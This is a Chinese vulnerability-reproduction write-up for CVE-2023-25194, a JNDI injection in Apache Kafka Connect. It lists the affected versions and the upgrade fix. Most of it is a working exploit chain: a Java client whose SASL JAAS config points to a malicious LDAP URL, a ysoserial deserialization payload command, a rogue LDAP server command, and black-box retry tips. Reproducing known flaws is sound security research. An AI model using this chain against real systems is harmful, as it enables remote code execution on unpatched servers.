Apache Kafka Connect JNDI注入漏洞复现(CVE-2023-25194)
漏洞描述
- 影响版本:2.3.0 <= Apache Kafka Connect <= 3.3.2
- 修复建议: 升级至3.4.0版本
- 官方链接:https://kafka.apache.org/cve-list
漏洞复现
本地先启动kafka server:
wget https://dlcdn.apache.org/kafka/3.4.0/kafka_2.13-3.4.0.tgz
tar -xvf kafka_2.13-3.4.0.tgz
//启动zk和kafka
bin/zookeeper-server-start.sh config/zookeeper.properties
bin/kafka-server-start.sh config/server.properties
//创建一个测试topic
bin/kafka-topics.sh --create --bootstrap-server localhost:9092 --replication-factor 1 --partitions 1 --topic test
测试代码
import org.apache.kafka.clients.producer.KafkaProducer;
import org.apache.kafka.clients.producer.Producer;
import org.apache.kafka.clients.producer.ProducerRecord;
import java.util.Properties;
public class Main {
public static void main(String[] args) {
Properties props = new Properties();
props.put("sasl.mechanism", "SCRAM-SHA-256");
props.put("security.protocol", "SASL_SSL");
props.put("sasl.jaas.config","com.sun.security.auth.module.JndiLoginModule "
+ "required user.provider.url=\"ldap://0.0.0.0:1389/Exploit\" "
+ "useFirstPass=\"true\" serviceName=\"x\" debug=\"true\" "
+ "group.provider.url=\"xxx\";");
props.put("bootstrap.servers", "0.0.0.0:9092");
props.put("key.deserializer", "org.apache.kafka.common.serialization.StringDeserializer");
props.put("value.deserializer", "org.apache.kafka.common.serialization.StringDeserializer");
props.put("key.serializer", "org.apache.kafka.common.serialization.StringSerializer");
props.put("value.serializer", "org.apache.kafka.common.serialization.StringSerializer");
new Thread(() -> {
Producer<String, String> producer = new KafkaProducer<>(props);
producer.send(new ProducerRecord<>("test", "hello", "world"));
producer.close();
}).start();
}
}
pom.xml文件:
<dependencies>
<dependency>
<groupId>org.apache.kafka</groupId>
<artifactId>kafka-clients</artifactId>
<version>3.3.0</version>
</dependency>
<dependency>
<groupId>commons-beanutils</groupId>
<artifactId>commons-beanutils</artifactId>
<version>1.8.3</version>
</dependency>
</dependencies>
生成反序列化数据
java -jar ysuserial-1.3-su18-all.jar -g CommonsBeanutils1183NOCC -p 'open -a Calculator.app' |base64|pbcopy
LDAP托管数据
使用恶意LDAP修改上一步生成的数据,然后启动:
java -cp HackerRMIRefServer-all.jar HackerLDAPRefServer 0.0.0.0 8088 1389
运行代码,然后计算器就弹出来了
测试中的问题
在反序列化的测试中,尝试了这几种jndi框架,只有第二种可以执行其中命令,但是还不够完美,最后还是用su18师傅的su18/ysoserial生成之后用ldap托管靠谱。
- https://github.com/Bl0omZ/JNDIEXP
- https://github.com/nu1r/JNDIExploit
- https://github.com/wyzxxz/jndi_tool
考虑到一种黑盒的情形,假如在使用urldns发现存在cb链,攻击的时候可以用ysoserial生成不同的payload多尝试几次。